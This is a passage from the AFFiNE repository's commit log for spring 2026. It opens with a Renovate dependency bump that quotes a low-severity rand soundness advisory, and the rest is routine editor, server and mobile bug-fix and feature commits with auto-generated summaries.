[unsound](https://rust-lang.github.io/unsafe-code-guidelines/glossary.html#soundness-of-code--of-a-library)
(i.e. that safe code using the public API can cause Undefined Behaviour)
when all the following conditions are met:

- The `log` and `thread_rng` features are enabled
- A [custom
logger](https://docs.rs/log/latest/log/#implementing-a-logger) is
defined
- The custom logger accesses `rand::rng()` (previously
`rand::thread_rng()`) and calls any `TryRng` (previously `RngCore`)
methods on `ThreadRng`
- The `ThreadRng` (attempts to) reseed while called from the custom
logger (this happens every 64 kB of generated data)
- Trace-level logging is enabled or warn-level logging is enabled and
the random source (the `getrandom` crate) is unable to provide a new
seed

`TryRng` (previously `RngCore`) methods for `ThreadRng` use `unsafe`
code to cast `*mut BlockRng<ReseedingCore>` to `&mut
BlockRng<ReseedingCore>`. When all the above conditions are met this
results in an aliased mutable reference, violating the Stacked Borrows
rules. Miri is able to detect this violation in sample code. Since
construction of [aliased mutable references is Undefined
Behaviour](https://doc.rust-lang.org/stable/nomicon/references.html),
the behaviour of optimized builds is hard to predict.

Affected versions of `rand` are `>= 0.7, < 0.9.3` and `0.10.0`.

##### Severity
Low

---

### Release Notes

<details>
<summary>rust-random/rand (rand)</summary>

### [`v0.9.3`](https://redirect.github.com/rust-random/rand/compare/0.9.2...0.9.3)

[Compare
Source](https://redirect.github.com/rust-random/rand/compare/0.9.2...0.9.3)

### [`v0.9.2`](https://redirect.github.com/rust-random/rand/blob/HEAD/CHANGELOG.md#092---2025-07-20)

[Compare
Source](https://redirect.github.com/rust-random/rand/compare/0.9.1...0.9.2)

##### Deprecated

- Deprecate `rand::rngs::mock` module and `StepRng` generator
([#1634](https://redirect.github.com/rust-random/rand/issues/1634))

##### Additions

- Enable `WeightedIndex<usize>` (de)serialization
([#1646](https://redirect.github.com/rust-random/rand/issues/1646))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-16 19:52:25 +08:00
Abdul Rehman 1d66e7e8ca fix(editor): allow hyperlink clicks in locked edgeless text blocks (#14829)
Fixes #14673

## Summary

When an edgeless text block is locked, `pointer-events: none` on the
inner content div (`edgeless-text-block.ts:308`) blocks all mouse
interaction — including clicking hyperlinks. Locking is intended to
prevent accidental edits, not to block navigation, so links should
remain clickable.

## Fix

Apply a `locked-content` class on the inner div when the block is locked
and not being edited, and add a targeted CSS rule restoring
`pointer-events: auto` on anchor elements within locked content.

## Context

Re-implements the fix from PR #14692 (authored by @moktamd, reverted per
@darkskygit's comment on #14673 because the original contributor had not
signed the CLA). The CLA is signed for this PR.

## Test plan

- [ ] On edgeless canvas, create a text block with a hyperlink (e.g.
`[link](https://affine.pro)`)
- [ ] Lock the block via the shape toolbar
- [ ] Hover the link → cursor shows pointer
- [ ] Click the link → navigation occurs
- [ ] Unlock and confirm editing still works as before

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Links within locked text blocks are now interactive and clickable with
proper visual cursor feedback.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-15 17:31:48 +08:00
Hana B c5b0057778 fix(core): resolve remaining untranslated doc title case in detail page header (#14820)
fix #14735

This PR fixes a remaining desktop case related to #14467.

The previous fix resolved incorrect translation in navigation panels,
but the detail page header tab title was still passing custom document
titles through `i18n.t()`, causing user-defined titles to be
unexpectedly translated.

### Results


https://github.com/user-attachments/assets/4abad3b9-d5d7-442f-b643-6d9ea63fa741

After:
<img width="2100" height="1722" alt="After"
src="https://github.com/user-attachments/assets/0770eae2-e5c5-4816-8d53-e40a4b52800c"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Updated page title retrieval mechanism in workspace detail page
headers. The title is now sourced directly from the document display
metadata service instead of using the previous derivation method.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-15 14:49:41 +08:00
DarkSky a109f069b0 chore: bump deps 2026-04-10 11:46:14 +08:00
DarkSky 0b4d25f332 chore: improve test stability 2026-04-09 13:11:36 +08:00
DarkSky c6a99eb9cb chore: bump deps (#14810)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Updated developer tooling dependencies used for local testing to newer
patch versions for improved stability.
* Bumped backend framework and related packages to newer patch releases
to address fixes and maintain compatibility.
* No functional or public API changes; updates are non-breaking
dependency version bumps.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-09 12:41:38 +08:00
DarkSky 77657a697b feat(mobile): improve notify for login failed 2026-04-09 11:35:15 +08:00
gogo199432 eb953c0565 fix(android): route OAuth deep link to correct server's AuthService (#14809)
Porting over iOS fix for self-hosted SSO to Android from #11563.

Fixes #12819

Tested on own instance using Authentik.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Android authentication now supports an optional server parameter in
the callback URL, enabling sign-in against different server instances.
* If the specified server cannot be found, the authentication attempt is
halted and an error is reported.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
2026-04-09 11:30:34 +08:00
Cats Juice 77c0b2ef47 fix: prevent IME preedit overflow in mind map node editor (#14520)
## Summary

Update the edgeless shape text editor to resize mind map node text
bounds while IME composition is in progress.

## Changes

- listen to `compositionupdate` on the inline editor container
- trigger `_updateElementWH()` on `compositionupdate` and
`compositionend`
- keep text box dimensions in sync before composition is committed

## Testing

- Not run locally: `pnpm` is not available in this environment, so
package build/tests could not be executed here.

Fixes #11515


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Editor mounting tolerates missing/null elements and validates input to
avoid errors.
* Text creation/update consistently targets the refreshed element to
prevent mismatches.
* Inline editor listens for IME composition events and schedules
layout/size recalculation (with proper cleanup) so sizing stays in sync.

* **Tests**
* Added an integration test verifying layout/size updates during IME
composition events.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-04-09 11:25:55 +08:00
DarkSky 7138fea9db fix: test stability 2026-04-09 11:21:25 +08:00
Ahsan Khaleeq 156cfc7e76 fix(core): improve table header sorting logic in processTable function (#14797)
Bug Resolved
#14795


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Made row and column sorting deterministic when items share the same
order value, reducing unexpected cell shifts.
* Adjusted comparator behavior to preserve tied-order grouping, which
may change displayed column/row sequence in edge cases.
* Improved consistency of table rendering and cell placement across
refreshes and edits.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-06 19:33:53 +00:00
Whitewater 2ca4973167 fix(editor): make repeated "Cancel line number" clicks work in code blocks (#14804)
Fixes #13555


https://github.com/user-attachments/assets/12e55c21-080c-4c69-9780-893ccad25b45

## Summary
- make the code block More popup reactive to `wrap` and `lineNumber`
prop updates
- read the latest toggle state at click time so same-menu double toggles
do not reuse stale closures
- add e2e coverage for wrap and line number toggling twice without
closing the More menu

## Bug Reason
- the code block More popup was rendered as a static portal, so it
stayed open without re-rendering after the first toggle
- the `Cancel line number` and `Wrap` menu actions captured render-time
state in their click handlers
- after the first click updated the model, a second click in the same
open menu reused stale state and wrote the same value again, so nothing
changed visually

## Testing
- yarn workspace @affine-test/blocksuite test e2e/code/crud.spec.ts

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Menu toggles now read and update the current wrap and line-number
states reliably.

* **Refactor**
* Replaced inline popup rendering with a dedicated more-menu component
for the code toolbar.

* **Style**
* Prevented text selection on menu action elements for smoother
interaction.

* **Tests**
  * Added e2e tests for wrap and line-number toggle flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-06 19:18:15 +00:00
DarkSky a1ae7d11a3 feat(core): add integration panel test 2026-04-07 02:12:02 +08:00
Jasper Zeng f41bc2d5c3 fix(editor): restore grouped manual ordering for kanban and arrange (#14630)
Fixes #14531, where manual vertical order is broken. [Root Cause](https://github.com/toeverything/AFFiNE/issues/14531#issuecomment-4052422436)

- Restored manual row/card sorting when building grouped kanban data.
- Reapplied `sortRow(...)` to each group before rendering `group.rows`.
- Fixed group/board arrange to reorder from the full group list,
including hidden or empty groups.
- Preserved consistent ordering between the settings panel and persisted
`groupProperties`.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Consolidated internal grouping and sorting logic to ensure consistent
ordering across grouped views; visible behavior unchanged.
* Moving groups or cards now uses a single, consistent ordering approach
to avoid intermittent ordering differences.
* **Tests**
* Added tests to verify manual per-group card order is applied and
preserved when moving cards between groups.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-04-07 02:09:05 +08:00
chauhan_s e3391c0577 feat: redirect account click & OAuth to Calendar settings (#14693)
### PR Description

* clicking a linked calendar account now switches settings to Workspace
Integrations and opens the Calendar settings directly
* calendar OAuth returns now land on Workspace Integrations with the
Calendar settings opened instead of the homepage
* Improves UX by reducing friction when managing calendar integrations

https://www.loom.com/share/49fa5c448ce049659877beb42d7bd81a


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Calendar integration settings can now be opened automatically
(including from OAuth redirects) and workspace settings support a
scroll-to-anchor.
* Integration account rows are now clickable for quick access to
settings.

* **Improvements**
* Enhanced visual feedback with interactive hover and focus states for
integration controls.

* **Tests**
* Added tests covering the OAuth redirect behavior and workspace
settings scroll/open handling.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-04-07 02:08:36 +08:00
DarkSky 5806ad8a3a fix(server): online and storage statistics (#14792)
#### PR Dependency Tree


* **PR #14792** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Admin dashboard returns more accurate sync and storage timelines with
carry‑forwarded minute buckets and corrected current totals.

* **Bug Fixes**
* Active-user flushes are debounced/scheduled to prevent overlapping
writes and reduce stale counts.
* Snapshot writes now retry and will skip gracefully when lock
contention prevents completion, avoiding partial snapshots.

* **Tests**
* New e2e tests cover carry‑forward behavior, no backfill outside
requested windows, and storage history accuracy.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-07 02:08:13 +08:00
DarkSky 193ec14ad3 feat(server): synthetic root doc (#14794) 2026-04-06 17:16:34 +08:00
DarkSky 64149d909a feat: follow publish mode if no params 2026-04-05 20:43:09 +08:00
chauhan_s f81abe692d fix(core): shared page mode syncing (#14756)
### Summary
This fixes a few inconsistencies in shared page behavior:
fixes https://github.com/toeverything/AFFiNE/issues/14751
- shared pages now open in the correct published mode when the URL does
not already include ?mode=...
- switching between page and edgeless in shared mode now keeps the URL
query param in sync
- the default Copy Link action now follows the current editor mode
- shared viewers can toggle between page and edgeless mode in readonly
share pages

---

### What Changed
- updated shared page mode resolution to prefer URL mode, with backend
publish mode as fallback
- added query-param syncing for shared page mode changes
- made the default share link copy use:
  - page link in page mode
  - edgeless link in edgeless mode
- allowed EditorModeSwitch to toggle both ways in shared mode
- extracted shared-mode behavior into small hooks to keep share-page.tsx
cleaner

---

### Demo

https://www.loom.com/share/a287172321fb4fc5b94f7c67a39298a9


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Mode switching between page and edgeless no longer blocked by shared
gating; shared pages initialize and respect the resolved editor mode.
* Shared page URLs stay in sync with editor mode and copy-link actions
include/preserve the selected mode.

* **Tests**
* Added tests for publish-mode resolution, query-string mode handling,
and default share-mode behavior.

* **Bug Fixes**
  * Updated shared-page “not found” UI text to match new messaging.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-04-05 20:20:58 +08:00
Xuan4781 aa48c1c18b fix: audio waveform clipping in horizontal card view (#14789)
Fixes #13399

### Issue
When viewing an audio attachment card in horizontal view, the waveform 
was being clipped and not fully visible. In vertical view it displayed 
correctly.

### Fix
- `audio-waveform` and `progressContainer` flex children were missing 
  `minWidth: 0` and `flex: 1`, causing container overflow
- `.affine-attachment-container` had a fixed height with `overflow:
hidden`
  that cut off the waveform row

### Screenshot Verification
**Before**
<img width="1661" height="935" alt="image"
src="https://github.com/user-attachments/assets/b2f0908b-94fe-4869-bdfb-cc6a757e703d"
/>

**After**
<img width="750" height="182" alt="image"
src="https://github.com/user-attachments/assets/63caac69-f37b-4894-80de-806b691581c8"
/>


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

**New Features**
- Introduced audio embed card functionality allowing users to embed and
display audio content directly in documents with standardized dimensions
and improved responsive layout styling for better visual presentation
and integration.

**Improvements**
- Enhanced styling and layout handling for audio player components to
ensure proper display and optimal rendering in various container sizes
and space constraints.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 17:35:39 +08:00
Ahsan Khaleeq 3219b82827 fix(core): hotkey option+cmd+c for Code Block (#14790)
This PR fixes #14755 bug

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed keyboard shortcut handling to properly distinguish between
locale input characters and actual shortcuts when using Alt+Meta key
combinations.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 17:21:23 +08:00
DarkSky b0cc2fd389 feat(editor): improve dated doc creation (#14791)
#### PR Dependency Tree


* **PR #14791** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-04-05 17:16:31 +08:00
chauhan_s 558400b7db feat: add auto-date titles for new documents (#14716)
## Summary

Adds an Editor setting to automatically title blank new documents with
the current date.
fixes https://github.com/toeverything/AFFiNE/issues/14709
https://www.loom.com/share/953b4eafcfb247839e977dca6f457229

## What Changed

- Added `Auto-title new docs with current date` under Editor settings
- Added `New doc date format`, shown only when auto-title is enabled
- Supported formats:
  - `DD-MM-YYYY`
  - `MM-DD-YYYY`
  - `YYYY-MM-DD`
  - `Journal style (localized)`
- Kept titles unique by appending duplicate-style suffixes:
  - `2026-03-24`
  - `2026-03-24(2)`
  - `2026-03-24(3)`

## Behavior

- Only applies to blank new docs
- Does not override explicitly provided titles
- Uses the existing journal-style localized formatter for the localized
option

## Implementation Notes

- Extended editor setting schema with:
  - `autoTitleNewDocWithCurrentDate`
  - `newDocDateTitleFormat`
- Added a helper for generating unique date-based titles
- Wired title generation into doc creation middleware
- Synced created titles into doc metadata so uniqueness works
consistently

## Tests

- Added unit coverage for:
  - date title formatting
  - duplicate suffix generation
  - doc creation middleware behavior
  - settings UI behavior


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* General settings: toggle to auto-insert current date into new document
titles; selectable formats: DD-MM-YYYY, MM-DD-YYYY, YYYY-MM-DD, and
localized "journal". Date-format chooser appears only when enabled.

* **Behavior**
* Blank new-docs are auto-populated per chosen format; user-provided
titles are preserved. Auto-generated titles avoid collisions by
appending incrementing suffixes.

* **Localization**
* Added translations for the setting, description, format chooser, and
all format labels.

* **Tests**
* Added UI and unit tests covering formatting, uniqueness, middleware
behavior, and interaction.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 17:10:01 +08:00
DarkSky fc5329a1be fix(server): skip watch for external cal (#14788)
#### PR Dependency Tree


* **PR #14788** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Calendar subscriptions now gracefully fall back to polling when push
notifications aren’t supported, keeping syncs working.
* Affected subscriptions have webhook details cleared and are marked
with a long-lived expiration to avoid repeated webhook attempts.
* Prevents repeated retries for unsupported push channels, reducing
unnecessary errors and retries.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 16:47:25 +08:00
DarkSky 547ab47a5e chore: improve ci (#14787) 2026-04-05 13:59:32 +08:00
DarkSky fee0cfa3f4 chore: bump deps (#14785)
#### PR Dependency Tree


* **PR #14785** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
  * Updated error-tracking SDK versions across frontend packages.
* Upgraded Electron build toolchain and front-end build plugins for
improved compatibility.
* Replaced a SWC-based React plugin with the standard React Vite plugin.
  * Removed unused development dependencies from CLI tooling.
  * Bumped a Rust workspace dependency to a patch release.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 12:25:18 +08:00
DarkSky ffc27af3ba fix(server): update version check (#14784)
fix #14780


#### PR Dependency Tree


* **PR #14784** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
* Improved upgrade availability detection to properly compare semantic
versions, including support for prerelease and canary versions. The
system now accurately identifies when new versions are available,
ensuring users receive timely update notifications.

* **Tests**
* Added comprehensive unit tests for version comparison and upgrade
detection functionality.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 10:56:05 +08:00
DarkSky d975bf46fb feat(server): improve calendar sync queue (#14783)
#### PR Dependency Tree


* **PR #14783** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Configurable request timeout for calendar integrations.
* Calendar polling now enqueues per-subscription sync jobs (larger
batch) for improved throughput.

* **Bug Fixes / Improvements**
* Persisted next-sync timestamps and retry counts for more reliable
scheduling and retry behavior.
* Exponential backoff and webhook renewal now update scheduling
consistently.

* **Refactor**
* Calendar sync flow moved to a job-queue-driven design for better
concurrency and observability.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 10:52:18 +08:00
chauhan_s bfcf7fc2ba fix: close docs bulk toolbar after delete (#14711)
### Before 
https://www.loom.com/share/a626b23f29cb4a48b33d721341d734f8

### After

https://www.loom.com/share/0c88ef4f92ac470fbb76608e2de43fa7


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Fixed floating toolbar remaining visible after deleting multiple
documents via the confirmation dialog so it reliably closes when
deletion completes.

* **Tests**
* Added end-to-end checks to verify the floating toolbar is dismissed
after multi-item and “select all” deletions.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-04-04 23:51:21 +08:00
DarkSky 5a6c65085a feat(mobile): adapt new endpoint (#14778)
#### PR Dependency Tree


* **PR #14778** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-04-04 20:39:42 +08:00
DarkSky 4be0cba9b5 chore(server): db health check (#14779)
#### PR Dependency Tree


* **PR #14779** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Added conditional init checks to service deployments and jobs to wait
for the database proxy before starting
* Exposed a new health port (9801) for the database proxy to enable
readiness probing

* **Tests**
  * Minor test reordering and formatting changes (no behavioral changes)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-04 00:09:37 +08:00
Hana B afea9121cf fix: save column header edits when pressing Enter (#14775)
## The Fix

Fixes #14744.

Updated the menu input Enter key behavior so that pressing Enter now
saves the edited database column header name and closes the menu
immediately.

This reuses the existing `blur()` save flow, keeping the behavior
consistent with clicking outside the input.

The Tab key behavior remains unchanged and still saves through the
existing blur flow.

## Video Demonstration

### After


https://github.com/user-attachments/assets/820a7c41-cae5-477c-8b65-b0667e0ce82b

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved keyboard handling in context menu input to properly blur the
input field when pressing Enter, ensuring cleaner interaction behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 20:18:58 +08:00
DarkSky 3912d8d74d fix: lint 2026-04-03 20:10:44 +08:00
DarkSky d3ec008b0c chore: bump deps (#14777)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Migration and config commands now feature interactive prompts for
required inputs.

* **Bug Fixes**
  * Enhanced error handling in CLI operations.

* **Chores**
  * Updated GraphQL Code Generator toolchain to v6.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 19:36:18 +08:00
Vitaly Barakov d0607b5ce7 chore(i18n): improve RU translate (#14718)
improve RU translate

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Improvements**
  * Enhanced Russian language support across the application.
* Updated messaging for self-hosted installations and workspace
licensing.
* Added Russian text for document analytics UI, including metrics and
viewer information.
* Added Russian text for workspace sharing controls and calendar
integration features.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 10:53:02 +08:00
DarkSky 8ca3f2d53d fix(core): settings i18n refresh (#14760)
replace #14758


#### PR Dependency Tree


* **PR #14760** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Enhanced language switching to ensure the settings dialog properly
reflects language changes when users update their language preference.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 03:37:49 +08:00
DarkSky 0da32d61ae fix(server): race condition for sync (#14770)
#### PR Dependency Tree


* **PR #14770** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

## Release Notes

* **New Features**
* Implemented batch processing for calendar synchronization to improve
performance and resource utilization.
* Added distributed locking to prevent concurrent operations in
multi-instance environments.

* **Bug Fixes**
* Improved reliability by preventing duplicate synchronization attempts.

* **Tests**
  * Enhanced test coverage for batch processing and locking mechanisms.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-03 03:37:09 +08:00
DarkSky 233004f867 chore: bump oxlint & enable more supported rules (#14769) 2026-04-03 03:36:52 +08:00
sanabriageorge cdadf8588a fix(core): nested numbered list order (#14764)
## The Fix ##
Fixes #13396. The issue happened because 'doc.getPrev(model)' returns the
previous node based on document order instead of the previous sibling within
the list level. This caused nested list items to inherit the numbering from
their parent rather than restarting. The fix ensures that numbering is
calculated relative to the correct list context.

## Video Demonstration ##
### Before ###

https://github.com/user-attachments/assets/9523209a-93d9-4984-aa9e-149ac1941036

### After ###

https://github.com/user-attachments/assets/ff28b166-3572-4536-9893-0ab5c05c8d9f






<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced numbered list ordering logic for improved list handling.

* **Chores**
* Updated environment configuration template with active sample values
for database connectivity, caching services, AI integrations, and email
delivery settings.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-02 20:06:25 +08:00
chauhan_s 8c07ea2a0e fix: allow PDF preview on readonly public pages (#14761)
fixes https://github.com/toeverything/AFFiNE/issues/14727

https://www.loom.com/share/dfcd558332404896b3e02aad97b18f02

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
  * PDF attachments can now be previewed in read-only documents.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-01 19:12:14 +08:00
DarkSky 91ad783973 fix(test): e2e stability (#14749)
#### PR Dependency Tree


* **PR #14749** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved link preview reliability by updating request identification
to better match modern browsers.
* **Tests**
* Made end-to-end and integration tests deterministic and more robust,
improving AI chat, image generation, attachment handling, settings
visibility, and editor flows.
* **Chores**
* Updated underlying tooling versions to enhance stability and
compatibility.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-29 23:26:15 +08:00
DarkSky 9ca520a81f feat(core): auto scroll for chat panel (#14748)
#### PR Dependency Tree


* **PR #14748** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Enhanced auto-scroll behavior for AI chat messages—the chat now
intelligently pauses auto-scrolling when you manually scroll away and
resumes when you scroll back near the bottom.
* Auto-scroll now pauses when expanding or collapsing AI tool results
and document edits.

* **Tests**
* Added unit tests for AI chat message scroll behavior and interactions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-29 22:17:10 +08:00
DarkSky 64f385817d feat(server): add perf metrics for apply update (#14736)
#### PR Dependency Tree


* **PR #14736** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Enhanced Kubernetes deployment health check configurations with
explicit timeout, period, failure threshold, and success threshold
settings for improved reliability.
* Improved document synchronization infrastructure with enhanced codec
comparison and merge update capabilities for better data consistency
handling.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 19:50:53 +08:00
chauhan_s 9cf98d9345 fix: restore kanban scroll in fullscreen mode (#14708)
fixes #14679

This fixes a layout issue where Kanban boards stopped horizontally
scrolling in fullscreen/full-width page mode.

https://github.com/user-attachments/assets/375fb8f7-3652-4207-8f9c-ee4cdae881ad


The root cause was not in the Kanban view itself, but in the page-mode
viewport wrapper. In fullscreen mode, the editor expands to full width,
and the existing display: table wrapper caused the outer editor
container to size from Kanban content instead of the viewport. That
prevented the Kanban scroller from owning horizontal overflow correctly.

### What changed
- Keep the fullscreen editor wrapper constrained to the viewport width
- Override the page-mode viewport content wrapper from display: table to
  display: block only when a fullscreen editor is present
- Leave the default/non-fullscreen layout behavior unchanged
### Why this works
With the outer fullscreen wrapper locked to viewport width, horizontal
overflow stays inside the Kanban view, so its existing overflow-x:
scroll behavior works again.



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved full-screen editor layout rendering to ensure proper width
and display constraints are applied correctly in full-screen mode.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 02:18:55 +08:00
chauhan_s a617da99e2 fix: iCloud CalDAV discovery fallback and resolve calendarsCount in GraphQL (#14728)
fixes #14696

iCloud was returning 400 Bad Request for /.well-known/caldav, which
caused AFFiNE to fail before reaching the actual CalDAV endpoints. This
change makes discovery fall back to the base CalDAV URL for that case,
which lets the iCloud account link flow continue successfully.

This also adds a GraphQL field resolver for
CalendarAccountObjectType.calendarsCount. The field is requested by the
frontend, but some mutation return paths were returning a raw account
object without that computed value, which caused GraphQL to fail on a
non-null field.

---

### Why this was needed

iCloud rejected the standard well-known discovery probe with 400, even
though the rest of the CalDAV flow worked.

calendarsCount is a computed field used by the frontend, so it should be
resolved by GraphQL rather than manually attached in individual service
methods.

---

### How to test

1. Generate an Apple app-specific password: [Apple
   Support](https://support.apple.com/en-gb/102654)
2. In AFFiNE, add an iCloud CalDAV account using:
   - your Apple Account email
   - the new app-specific password
3. Confirm the account links successfully and calendars load without the
   previous GraphQL error.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
  * Calendar accounts now display the total number of calendars.

* **Bug Fixes**
* Enhanced calendar discovery process to handle additional HTTP error
conditions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 02:16:25 +08:00
DarkSky a41c5e4366 feat: adapt cloudflare worker ai (#14732)
#### PR Dependency Tree


* **PR #14732** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Cloudflare Workers AI added as a Copilot provider (configurable in
admin settings).
  * Gemini 3.1 Flash Lite Preview model made available.

* **Behavior Changes**
* Reranking now uses a different default model identifier (affects
relevancy scores).

* **Tests**
* Rerank tests adjusted to focus on the updated model and expected
results.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-27 02:15:49 +08:00
DarkSky 5b05c5a1b2 feat(server): refactor record schema (#14729)
#### PR Dependency Tree


* **PR #14729** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Transcriptions now produce structured meeting summaries (strict JSON)
and a normalized, speaker‑tagged, non‑overlapping transcript with legacy
projection support.

* **API**
